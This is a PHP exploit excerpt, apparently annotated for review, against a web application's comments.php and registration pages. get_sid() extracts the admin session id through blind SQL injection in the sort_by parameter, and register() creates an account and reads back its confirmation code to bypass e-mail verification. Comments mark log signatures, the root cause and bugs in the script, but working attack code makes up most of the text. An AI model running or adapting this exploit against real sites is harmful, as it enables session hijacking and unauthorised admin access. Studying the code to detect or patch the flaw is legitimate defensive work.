function get_sid() {
    // Reads a session id out of the `{$prefix}sessions` table one character at
    // a time, using the `sort_by` query parameter of comments.php as a blind
    // SQL-injection point (the page either matches $default_record or not).
    // Globals $host, $path, $prefix and $default_record are set elsewhere in
    // the file; encodeSQL(), http_send() and PATTERN are also defined elsewhere.
    // Defender's note: the injected text uses `/**/` in place of spaces and a
    // `SELECT/**/IF(ASCII(SUBSTR(` probe in a sort parameter — both are easy to
    // match in web-server or WAF logs. The root cause is an unvalidated
    // `sort_by` value reaching SQL; whitelisting sort columns removes it.
    global $host, $path, $prefix, $default_record;
    // Candidate byte values: 0 (used as the "end of id" terminator below),
    // then ASCII '0'-'9' (48-57) and 'a'-'f' (97-102), i.e. the hex alphabet.
    $chars = array_merge(array(0), range(48, 57), range(97, 102)); // 0, 0-9, a-f
    $index = 1;
    $sid = "";
    // Request template; %s is filled with the SQL fragment built per guess.
    // The pwg_id cookie is a fixed dummy value (md5 of "foo").
    $packet = "GET {$path}comments.php?sort_by=%s HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Cookie: pwg_id=" . md5("foo") . "\r\n";
    $packet .= "Connection: close\r\n\r\n";
    print "\n[-] Fetching admin SID: ";
    // Loop until a NUL byte is appended, i.e. SUBSTR() returned nothing at
    // position $index. NOTE(review): strpos() returns 0 (falsy) when the NUL
    // is the very first character, so an empty id would never terminate.
    while (!strpos($sid, chr(0))) {
        for ($i = 0, $n = count($chars); $i <= $n; $i++) {
            // Reaching $i == $n means no candidate matched at this position.
            if ($i == $n) {
                die("\n\n[-] Exploit failed...try later!\n");
            }
            // IF() selects a different column depending on whether the guessed
            // byte matches, which changes the rendered page. The LIKE filter
            // picks the session whose serialized data contains "pwg_uid|i:1;"
            // (presumably user id 1 — not verifiable from this file).
            $sql = "(SELECT/**/IF(ASCII(SUBSTR(id,{$index},1))={$chars[$i]},author,id)/**/FROM/**/{$prefix}sessions"
                . "/**/WHERE/**/data/**/LIKE/**/" . encodeSQL("pwg_uid|i:1;")
                . "/**/LIMIT/**/1)/**/LIMIT/**/1/*";
            preg_match(PATTERN, http_send($host, sprintf($packet, $sql)), $match);
            // NOTE(review): $match[1] is undefined when PATTERN does not match
            // (e.g. a connection error or an unexpected page), which then
            // compares as a hit.
            if ($match[1] != $default_record) {
                $sid .= chr($chars[$i]);
                print chr($chars[$i]);
                break;
            }
        }
        $index++;
    }
    print "\n";
    return $sid;
}
function register() {
    // Creates a new account through register.php, reads its confirmation code
    // back from `member_profile` with retrive_data() (defined elsewhere in
    // the file; its mechanism is not visible here), then hits confirm.php.
    // Globals $host, $path, $username and $password are set elsewhere.
    // Defender's note: a registration flow whose `random_code` can be read
    // back by an unauthenticated client defeats e-mail confirmation entirely;
    // the code should only ever leave the server in the confirmation mail.
    // The password is also printed in clear text below.
    global $host, $path, $username, $password;
    print "\n[-] Registering new user '{$username}' with password '{$password}'\n";
    // Register a new account. The e-mail is a throwaway md5(time())@null.com
    // address; $username and $password are interpolated without urlencode().
    $data = "user_name={$username}";
    $data .= "&password={$password}";
    $data .= "&confirm_password={$password}";
    $data .= "&email_address=" . md5(time()) . "@null.com";
    $data .= "&form_submitted=yes";
    $data .= "&terms=yes";
    $packet = "POST {$path}register.php HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Content-Length: " . strlen($data) . "\r\n";
    $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $packet .= "Connection: close\r\n\r\n";
    $packet .= $data;
    // The registration response itself is not inspected; success is judged
    // only by whether a confirmation code can be read back afterwards.
    http_send($host, $packet);
    $code = retrive_data("random_code", "member_profile", "user_name=" . encodeSQL($username));
    // NOTE(review): isset() only catches null; an empty string or false
    // returned by retrive_data() would pass and produce a bogus confirm URL.
    if (!isset($code)) {
        die("\n[-] Registration failed...\n");
    }
    // Confirm the registration; $code is placed in the URL without encoding.
    $packet = "GET {$path}confirm.php?id={$code} HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Connection: close\r\n\r\n";
    // Success is detected by a fixed phrase in the page body, so a changed
    // or localized confirmation message reads as failure.
    if (!preg_match("/registration is now complete/i", http_send($host, $packet))) {
        die("\n[-] Registration failed...\n");
    }
}